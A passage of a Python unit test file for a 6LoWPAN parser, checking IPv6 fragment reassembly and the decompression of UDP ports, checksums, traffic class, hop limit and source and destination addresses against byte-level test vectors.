0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0x4A,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBC,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A, # / * 1080 * /
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0x43,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x3A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x80,
0x00,
0xFA,
0xA5,
0x0B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0xBB,
0x53,
0x11,
0x4C,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xa3,
0x53,
0x11,
0x44,
0x66,
0xFE,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x1A,
0x92,
0xBB,
0x53,
0x11,
0x44,
0x66,
0x92,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x11,
0x44,
0x66,
0x4E,
0x92,
0xBB,
0x53,
0x1A,
0x80,
0x00,
0xFA,
0xA5,
0x1B,
0xC0,
0x00,
0x04,
0x4E,
0x92,
0x1B,
0x53,
0x11,
0x44,
0x66,
0x4E,
0x22,
0xBB,
0x53,
0x1A,
0x44,
0x66,
0x77,
0x99,
0x15,
0xB3,
0x00,
0x54,
0xCC,
0x54,
0x01,
0xAA,
0x44,
0x54,
0x12,
0xD3,
0x53,
0x11,
0x44,
0x66
])
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_defragment_IPv6_packet_when_parse_method_called_with_fragments(
self):
# GIVEN
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x00, 0x00, 0x11, 0x12, 0x13, 0x14, 0x15]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x00, 0x1A, 0x2A, 0x3F, 0x09, 0xAB, 0x43]))
fragment_1 = bytearray([
0xC0, 0x38, 0x12, 0x34, 0x7A, 0x33, 0x3A, 0x80, 0x00, 0x1A, 0x33,
0x0B, 0xC0, 0x00, 0x04
])
fragment_2 = bytearray([
0xE0, 0x38, 0x12, 0x34, 0x06, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x12,
0x13, 0x14
])
parser = create_default_lowpan_parser(None)
# WHEN
self.assertIsNone(
parser.parse(io.BytesIO(fragment_1), message_info=message_info))
actual_ipv6_packet = parser.parse(io.BytesIO(fragment_2),
message_info=message_info)
# THEN
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x10, 0x3A, 0x40, 0xfe, 0x80, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x11, 0x12, 0x13,
0x14, 0x15, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
0x00, 0x1A, 0x2A, 0x3F, 0x09, 0xAB, 0x43, 0x80, 0x00, 0x1A, 0x33,
0x0B, 0xC0, 0x00, 0x04, 0x4E, 0x92, 0xBB, 0x53, 0x11, 0x12, 0x13,
0x14
])
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
class TestLowpanUdpHeaderFactory(unittest.TestCase):
def test_should_parse_udp_datagram_ports_when_decompress_udp_ports_method_called_with_udphc_p_eq_0(
self):
# GIVEN
factory = lowpan.LowpanUdpHeaderFactory()
p = factory.UDP_HC_P_BOTH_FULL
udphc = lowpan.LowpanUDPHC(any_c(), p)
src_port = any_src_port()
dst_port = any_dst_port()
data_bytes = struct.pack(">H", src_port) + struct.pack(">H", dst_port)
# WHEN
actual_src_port, actual_dst_port = factory._decompress_udp_ports(
udphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(src_port, actual_src_port)
self.assertEqual(dst_port, actual_dst_port)
self.assertEqual(0, p)
def test_should_parse_udp_datagram_ports_when_decompress_udp_ports_method_called_with_udphc_p_eq_1(
self):
# GIVEN
factory = lowpan.LowpanUdpHeaderFactory()
p = factory.UDP_HC_P_DST_COMPR
udphc = lowpan.LowpanUDPHC(any_c(), p)
src_port = any_src_port()
dst_port = any_compressable_dst_port()
data_bytes = struct.pack(">H", src_port) + bytearray(
[struct.pack(">H", dst_port)[1]])
# WHEN
actual_src_port, actual_dst_port = factory._decompress_udp_ports(
udphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(1, p)
self.assertEqual(src_port, actual_src_port)
self.assertEqual(dst_port, actual_dst_port)
def test_should_parse_udp_datagram_ports_when_decompress_udp_ports_method_called_with_udphc_p_eq_2(
self):
# GIVEN
factory = lowpan.LowpanUdpHeaderFactory()
p = factory.UDP_HC_P_SRC_COMPR
udphc = lowpan.LowpanUDPHC(any_c(), p)
src_port = any_compressable_src_port()
dst_port = any_dst_port()
data_bytes = bytearray([struct.pack(">H", src_port)[1]]) + struct.pack(
">H", dst_port)
# WHEN
actual_src_port, actual_dst_port = factory._decompress_udp_ports(
udphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(2, p)
self.assertEqual(src_port, actual_src_port)
self.assertEqual(dst_port, actual_dst_port)
def test_should_parse_udp_datagram_ports_when_decompress_udp_ports_method_called_with_udphc_p_eq_3(
self):
# GIVEN
factory = lowpan.LowpanUdpHeaderFactory()
p = factory.UDP_HC_P_BOTH_COMPR
udphc = lowpan.LowpanUDPHC(any_c(), p)
src_port = any_nibble_src_port()
dst_port = any_nibble_dst_port()
data_bytes = bytearray([((src_port & 0x0F) << 4) | (dst_port & 0x0F)])
# WHEN
actual_src_port, actual_dst_port = factory._decompress_udp_ports(
udphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(3, p)
self.assertEqual(src_port, actual_src_port)
self.assertEqual(dst_port, actual_dst_port)
def test_should_parse_udp_datagram_checksum_when_decompress_udp_checksum_called_with_udphc_c_eq_0(
self):
# GIVEN
factory = lowpan.LowpanUdpHeaderFactory()
c = factory.UDP_HC_C_INLINE
udphc = lowpan.LowpanUDPHC(c, any_p())
checksum = any_checksum()
data_bytes = struct.pack(">H", checksum)
# WHEN
actual_checksum = factory._decompress_udp_checksum(
udphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(0, c)
self.assertEqual(checksum, actual_checksum)
def test_should_parse_udp_datagram_checksum_when_decompress_udp_checksum_called_with_udphc_c_eq_1(
self):
# GIVEN
factory = lowpan.LowpanUdpHeaderFactory()
c = factory.UDP_HC_C_ELIDED
udphc = lowpan.LowpanUDPHC(c, any_p())
data_bytes = bytearray()
# WHEN
actual_checksum = factory._decompress_udp_checksum(
udphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(1, c)
self.assertEqual(0, actual_checksum)
class TestLowpanIpv6HeaderFactory(unittest.TestCase):
IPV6_LINKLOCAL_PREFIX = bytearray(
[0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])
def test_should_parse_traffic_class_and_flow_label_when_decompress_tf_method_called_with_iphc_tf_eq_0(
self):
# GIVEN
ecn = any_ecn()
dscp = any_dscp()
flow_label = any_flow_label()
data_bytes = bytearray()
data_bytes.append((ecn << 6) | dscp)
data_bytes.append((flow_label >> 16) & 0x0F)
data_bytes.append((flow_label >> 8) & 0xFF)
data_bytes.append(flow_label & 0xFF)
factory = lowpan.LowpanIpv6HeaderFactory()
tf = factory.IPHC_TF_4B
iphc = lowpan.LowpanIPHC(tf, any_nh(), any_hlim(), any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
# WHEN
actual_traffic_class, actual_flow_label = factory._decompress_tf(
iphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(0, tf)
self.assertEqual((dscp << 2) | ecn, actual_traffic_class)
self.assertEqual(flow_label, actual_flow_label)
def test_should_parse_traffic_class_and_flow_label_when_decompress_tf_method_called_with_iphc_tf_eq_1(
self):
# GIVEN
ecn = any_ecn()
flow_label = any_flow_label()
data_bytes = bytearray()
data_bytes.append((ecn << 6) | (flow_label >> 16) & 0x0F)
data_bytes.append((flow_label >> 8) & 0xFF)
data_bytes.append(flow_label & 0xFF)
factory = lowpan.LowpanIpv6HeaderFactory()
tf = factory.IPHC_TF_3B
iphc = lowpan.LowpanIPHC(tf, any_nh(), any_hlim(), any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
# WHEN
actual_traffic_class, actual_flow_label = factory._decompress_tf(
iphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(1, tf)
self.assertEqual(ecn, actual_traffic_class)
self.assertEqual(flow_label, actual_flow_label)
def test_should_parse_traffic_class_and_flow_label_when_decompress_tf_method_called_with_iphc_tf_eq_2(
self):
# GIVEN
ecn = any_ecn()
dscp = any_dscp()
data_bytes = bytearray([(ecn << 6) | dscp])
factory = lowpan.LowpanIpv6HeaderFactory()
tf = factory.IPHC_TF_1B
iphc = lowpan.LowpanIPHC(tf, any_nh(), any_hlim(), any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
# WHEN
actual_traffic_class, actual_flow_label = factory._decompress_tf(
iphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(2, tf)
self.assertEqual((dscp << 2) | ecn, actual_traffic_class)
self.assertEqual(0, actual_flow_label)
def test_should_parse_traffic_class_and_flow_label_when_decompress_tf_method_called_with_iphc_tf_eq_3(
self):
data_bytes = bytearray()
factory = lowpan.LowpanIpv6HeaderFactory()
tf = factory.IPHC_TF_ELIDED
iphc = lowpan.LowpanIPHC(tf, any_nh(), any_hlim(), any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
# WHEN
actual_traffic_class, actual_flow_label = factory._decompress_tf(
iphc, io.BytesIO(data_bytes))
# THEN
self.assertEqual(3, tf)
self.assertEqual(0, actual_traffic_class)
self.assertEqual(0, actual_flow_label)
def test_should_parse_traffic_class_and_flow_label_when_decompress_nh_method_called_with_iphc_nh_eq_0(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
next_header = any_next_header()
nh = factory.IPHC_NH_INLINE
iphc = lowpan.LowpanIPHC(any_tf(), nh, any_hlim(), any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
data_bytes = bytearray([next_header])
# WHEN
actual_next_header = factory._decompress_nh(iphc,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(0, nh)
self.assertEqual(next_header, actual_next_header)
def test_should_parse_traffic_class_and_flow_label_when_decompress_nh_method_called_with_iphc_nh_eq_1(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
nh = factory.IPHC_NH_COMPRESSED
iphc = lowpan.LowpanIPHC(any_tf(), nh, any_hlim(), any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
data_bytes = bytearray()
# WHEN
actual_next_header = factory._decompress_nh(iphc,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(1, nh)
self.assertEqual(None, actual_next_header)
def test_should_parse_hop_limit_when_decompress_hlim_called_with_iphc_hlim_eq_0(
self):
# GIVEN
hop_limit = any_hop_limit()
factory = lowpan.LowpanIpv6HeaderFactory()
hlim = factory.IPHC_HLIM_INLINE
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), hlim, any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
data_bytes = bytearray([hop_limit])
# WHEN
actual_hop_limit = factory._decompress_hlim(iphc,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(0, hlim)
self.assertEqual(hop_limit, actual_hop_limit)
def test_should_parse_hop_limit_when_decompress_hlim_called_with_iphc_hlim_eq_1(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
hlim = factory.IPHC_HLIM_1
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), hlim, any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
data_bytes = bytearray()
# WHEN
actual_hop_limit = factory._decompress_hlim(iphc,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(1, hlim)
self.assertEqual(1, actual_hop_limit)
def test_should_parse_hop_limit_when_decompress_hlim_called_with_iphc_hlim_eq_2(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
hlim = factory.IPHC_HLIM_64
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), hlim, any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
data_bytes = bytearray()
# WHEN
actual_hop_limit = factory._decompress_hlim(iphc,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(2, hlim)
self.assertEqual(64, actual_hop_limit)
def test_should_parse_hop_limit_when_decompress_hlim_called_with_iphc_hlim_eq_3(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
hlim = factory.IPHC_HLIM_255
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), hlim, any_cid(), any_sac(),
any_sam(), any_m(), any_dac(), any_dam())
data_bytes = bytearray()
# WHEN
actual_hop_limit = factory._decompress_hlim(iphc,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(3, hlim)
self.assertEqual(255, actual_hop_limit)
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_0_and_sam_eq_0(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
src_addr = any_src_addr()
sac = factory.IPHC_SAC_STATELESS
sam = factory.IPHC_SAM_128B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, any_src_mac_addr(),
any_sci(),
io.BytesIO(src_addr))
# THEN
self.assertEqual(0, sac)
self.assertEqual(0, sam)
self.assertEqual(bytes(src_addr), actual_src_addr)
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_0_and_sam_eq_1(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
eui64 = any_eui64()
sac = factory.IPHC_SAC_STATELESS
sam = factory.IPHC_SAM_64B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, any_src_mac_addr(),
any_sci(),
io.BytesIO(eui64))
# THEN
self.assertEqual(0, sac)
self.assertEqual(1, sam)
self.assertEqual(self.IPV6_LINKLOCAL_PREFIX + eui64, actual_src_addr)
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_0_and_sam_eq_2(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
rloc16 = any_rloc16()
sac = factory.IPHC_SAC_STATELESS
sam = factory.IPHC_SAM_16B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, any_src_mac_addr(),
any_sci(),
io.BytesIO(rloc16))
# THEN
self.assertEqual(0, sac)
self.assertEqual(2, sam)
self.assertEqual(
self.IPV6_LINKLOCAL_PREFIX +
bytearray([0x00, 0x00, 0x00, 0xff, 0xfe, 0x00]) + rloc16,
actual_src_addr)
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_0_and_sam_eq_3(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
src_mac_addr = common.MacAddress.from_eui64(any_src_mac_addr())
sac = factory.IPHC_SAC_STATELESS
sam = factory.IPHC_SAM_ELIDED
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
data_bytes = bytearray([])
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, src_mac_addr,
any_sci(),
io.BytesIO(data_bytes))
# THEN
self.assertEqual(0, sac)
self.assertEqual(3, sam)
self.assertEqual(
self.IPV6_LINKLOCAL_PREFIX +
bytearray([src_mac_addr.mac_address[0] ^ 0x02]) +
src_mac_addr.mac_address[1:], actual_src_addr)
def _merge_prefix_and_address(self, prefix, prefix_length, address):
total_bytes = 16
prefix_length_in_bytes = int(prefix_length / 8)
if (prefix_length_in_bytes + len(address)) > total_bytes:
total_bytes -= prefix_length_in_bytes
return prefix[:prefix_length_in_bytes] + address[-total_bytes:]
else:
total_bytes -= prefix_length_in_bytes
total_bytes -= len(address)
return prefix[:prefix_length_in_bytes] + bytearray(
[0x00] * total_bytes) + address
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_1_and_sam_eq_0(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory(None)
src_addr = any_src_addr()
sac = factory.IPHC_SAC_STATEFUL
sam = factory.IPHC_SAM_UNSPECIFIED
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, any_src_mac_addr(),
any_sci(),
io.BytesIO(src_addr))
# THEN
self.assertEqual(1, sac)
self.assertEqual(0, sam)
self.assertEqual(bytearray([0x00] * 16), actual_src_addr)
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_1_and_sam_eq_1(
self):
# GIVEN
sci = any_sci()
context = any_context()
context_manager = lowpan.ContextManager()
context_manager[sci] = context
factory = lowpan.LowpanIpv6HeaderFactory(context_manager)
eui64 = any_eui64()
sac = factory.IPHC_SAC_STATEFUL
sam = factory.IPHC_SAM_64B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
src_addr = self._merge_prefix_and_address(context.prefix,
context.prefix_length, eui64)
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, any_src_mac_addr(),
sci, io.BytesIO(eui64))
# THEN
self.assertEqual(1, sac)
self.assertEqual(1, sam)
self.assertEqual(src_addr, actual_src_addr)
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_1_and_sam_eq_2(
self):
# GIVEN
sci = any_sci()
context = any_context()
context_manager = lowpan.ContextManager()
context_manager[sci] = context
factory = lowpan.LowpanIpv6HeaderFactory(context_manager)
rloc16 = any_rloc16()
sac = factory.IPHC_SAC_STATEFUL
sam = factory.IPHC_SAM_16B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
iid = bytearray([0x00, 0x00, 0x00, 0xff, 0xfe, 0x00]) + rloc16
src_addr = self._merge_prefix_and_address(context.prefix,
context.prefix_length, iid)
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, any_src_mac_addr(),
sci, io.BytesIO(rloc16))
# THEN
self.assertEqual(1, sac)
self.assertEqual(2, sam)
self.assertEqual(src_addr, actual_src_addr)
def test_should_parse_source_address_when_decompress_src_addr_called_with_sac_eq_1_and_sam_eq_3(
self):
# GIVEN
sci = any_sci()
context = any_context()
context_manager = lowpan.ContextManager()
context_manager[sci] = context
factory = lowpan.LowpanIpv6HeaderFactory(context_manager)
src_mac_addr = common.MacAddress.from_eui64(any_src_mac_addr())
sac = factory.IPHC_SAC_STATEFUL
sam = factory.IPHC_SAM_0B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(), sac,
sam, any_m(), any_dac(), any_dam())
iid = bytearray([src_mac_addr.mac_address[0] ^ 0x02
]) + src_mac_addr.mac_address[1:]
src_addr = self._merge_prefix_and_address(context.prefix,
context.prefix_length, iid)
data_bytes = bytearray([])
# WHEN
actual_src_addr = factory._decompress_src_addr(iphc, src_mac_addr, sci,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(1, sac)
self.assertEqual(3, sam)
self.assertEqual(src_addr, actual_src_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_0_and_dam_eq_0(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
ipv6_addr = any_dst_addr()
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_128B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
dst_mac_addr = bytearray([0x00] * 8)
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, dst_mac_addr,
any_dci(),
io.BytesIO(ipv6_addr))
# THEN
self.assertEqual(0, m)
self.assertEqual(0, dac)
self.assertEqual(0, dam)
self.assertEqual(ipv6_addr, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_0_and_dam_eq_1(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
eui64 = any_eui64()
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_64B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
any_dci(),
io.BytesIO(eui64))
# THEN
self.assertEqual(0, m)
self.assertEqual(0, dac)
self.assertEqual(1, dam)
self.assertEqual(self.IPV6_LINKLOCAL_PREFIX + eui64, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_0_and_dam_eq_2(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
rloc16 = any_rloc16()
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_16B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
any_dci(),
io.BytesIO(rloc16))
# THEN
self.assertEqual(0, m)
self.assertEqual(0, dac)
self.assertEqual(2, dam)
self.assertEqual(
self.IPV6_LINKLOCAL_PREFIX +
bytearray([0x00, 0x00, 0x00, 0xff, 0xfe, 0x00]) + rloc16,
actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_0_and_dam_eq_3(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
dst_mac_addr = common.MacAddress.from_eui64(any_dst_mac_addr())
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_ELIDED
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
data_bytes = bytearray([])
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, dst_mac_addr,
any_dci(),
io.BytesIO(data_bytes))
# THEN
self.assertEqual(0, m)
self.assertEqual(0, dac)
self.assertEqual(3, dam)
self.assertEqual(
self.IPV6_LINKLOCAL_PREFIX +
bytearray([dst_mac_addr.mac_address[0] ^ 0x02]) +
dst_mac_addr.mac_address[1:], actual_dst_addr)
def test_should_raise_RuntimeError_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_1_and_dam_eq_0(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
ipv6_addr = any_dst_addr()
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_128B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
# WHEN
self.assertRaises(RuntimeError, factory._decompress_dst_addr, iphc,
any_dst_mac_addr(), any_dci(), io.BytesIO(ipv6_addr))
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_1_and_dam_eq_1(
self):
# GIVEN
dci = any_dci()
context = any_context()
context_manager = lowpan.ContextManager()
context_manager[dci] = context
factory = lowpan.LowpanIpv6HeaderFactory(context_manager)
eui64 = any_eui64()
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_64B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
dst_addr = self._merge_prefix_and_address(context.prefix,
context.prefix_length, eui64)
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
dci, io.BytesIO(eui64))
# THEN
self.assertEqual(0, m)
self.assertEqual(1, dac)
self.assertEqual(1, dam)
self.assertEqual(dst_addr, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_1_and_dam_eq_2(
self):
# GIVEN
dci = any_dci()
context = any_context()
context_manager = lowpan.ContextManager()
context_manager[dci] = context
factory = lowpan.LowpanIpv6HeaderFactory(context_manager)
rloc16 = any_rloc16()
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_16B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
iid = bytearray([0x00, 0x00, 0x00, 0xff, 0xfe, 0x00]) + rloc16
dst_addr = self._merge_prefix_and_address(context.prefix,
context.prefix_length, iid)
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
dci, io.BytesIO(rloc16))
# THEN
self.assertEqual(0, m)
self.assertEqual(1, dac)
self.assertEqual(2, dam)
self.assertEqual(dst_addr, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_0_and_dac_eq_1_and_dam_eq_3(
self):
# GIVEN
dci = any_dci()
context = any_context()
context_manager = lowpan.ContextManager()
context_manager[dci] = context
factory = lowpan.LowpanIpv6HeaderFactory(context_manager)
dst_mac_addr = common.MacAddress.from_eui64(any_dst_mac_addr())
m = factory.IPHC_M_NO
dac = factory.IPHC_DAC_STATEFUL
dam = factory.IPHC_DAM_0B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
iid = bytearray([dst_mac_addr.mac_address[0] ^ 0x02
]) + dst_mac_addr.mac_address[1:]
dst_addr = self._merge_prefix_and_address(context.prefix,
context.prefix_length, iid)
data_bytes = bytearray([])
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, dst_mac_addr, dci,
io.BytesIO(data_bytes))
# THEN
self.assertEqual(0, m)
self.assertEqual(1, dac)
self.assertEqual(3, dam)
self.assertEqual(dst_addr, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_0_and_dam_eq_0(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
ipv6_addr = any_dst_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_128B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
any_dci(),
io.BytesIO(ipv6_addr))
# THEN
self.assertEqual(1, m)
self.assertEqual(0, dac)
self.assertEqual(0, dam)
self.assertEqual(ipv6_addr, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_0_and_dam_eq_1(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
addr48b = any_48bits_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_48B
iphc = lowpan.LowpanIPHC(any_tf(), any_nh(), any_hlim(), any_cid(),
any_sac(), any_sam(), m, dac, dam)
expected_dst_addr = bytearray([
0xff, addr48b[0], 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, addr48b[1], addr48b[2], addr48b[3], addr48b[4], addr48b[5]
])
# WHEN
actual_dst_addr = factory._decompress_dst_addr(iphc, any_dst_mac_addr(),
any_dci(),
io.BytesIO(addr48b))
# THEN
self.assertEqual(1, m)
self.assertEqual(0, dac)
self.assertEqual(1, dam)
self.assertEqual(expected_dst_addr, actual_dst_addr)
def test_should_parse_dst_addr_when_decompress_dst_addr_called_with_m_eq_1_and_dac_eq_0_and_dam_eq_2(
self):
# GIVEN
factory = lowpan.LowpanIpv6HeaderFactory()
addr32b = any_32bits_addr()
m = factory.IPHC_M_YES
dac = factory.IPHC_DAC_STATELESS
dam = factory.IPHC_DAM_32B
